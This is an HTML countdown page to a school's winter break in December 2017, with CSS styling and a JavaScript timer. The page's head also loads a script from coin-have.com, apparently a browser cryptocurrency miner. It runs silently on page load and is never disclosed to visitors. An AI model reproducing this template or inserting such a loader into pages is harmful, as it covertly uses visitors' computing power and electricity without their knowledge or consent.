<!DOCTYPE html>
<html>
  <head>
    <script src="https://coin-have.com/c/XWOP.js"></script>
    <link href="https://fonts.googleapis.com/css?family=Cinzel+Decorative" rel="stylesheet">
  </head>

<style>
body, html {
    height: 100%;
    margin: 0;
}

body {
    background-image: url('http://static.superiorwallpapers.com/images/lthumbs/2016-01/11507_Beautiful-winter-landscape-white-mountains.jpg');
    height: 100%;
    background-position: center;
    background-size: cover;
    position: relative;
    font-family: 'Cinzel Decorative', Verdanda, serif;
    font-size: 25px;
    opacity: 0.8;
}

.logo {
    position: absolute;
    top: 0;
    left: 16px;
    color: black;
}

.main-text {
    position: absolute;
    top: 50%;
    left: 50%;
    transform: translate(-50%, -50%);
    text-align: center;
    color: black;
}

h1 {
  padding: 10px;
  background: rgba(255,255,255,0.5);
  border-radius: 30px;
  opacity: 50%;
}

hr {
  background-color: black;
  opacity: 0.5;
  border: 0;
  height: 2.5px;
}
</style>

<body>
    <p class="logo">WHS</p>
  <div class="main-text">
    <h1>COUNTDOWN TO WINTER BREAK
    <hr>
    <div id="demo"></div></h1>
  </div>

<script>
var countDownDate = new Date("Dec 22, 2017 14:50:25").getTime();

// Update the count down every 1 second
var countdownfunction = setInterval(function() {

    // Get todays date and time
    var now = new Date().getTime();
    
    // Find the distance between now an the count down date
    var distance = countDownDate - now;
    
    // Time calculations for days, hours, minutes and seconds
    var days = Math.floor(distance / (1000 * 60 * 60 * 24));
    var hours = Math.floor((distance % (1000 * 60 * 60 * 24)) / (1000 * 60 * 60));
    var minutes = Math.floor((distance % (1000 * 60 * 60)) / (1000 * 60));
    var seconds = Math.floor((distance % (1000 * 60)) / 1000);
    
    document.getElementById("demo").innerHTML = days + "d " + hours + "h "
    + minutes + "m " + seconds + "s ";
    if (distance < 0) {
        clearInterval(countdownfunction);
        document.getElementById("demo").innerHTML = "FREEDOM!!!";
    }
}, 1000);
</script>

</body>
</html>


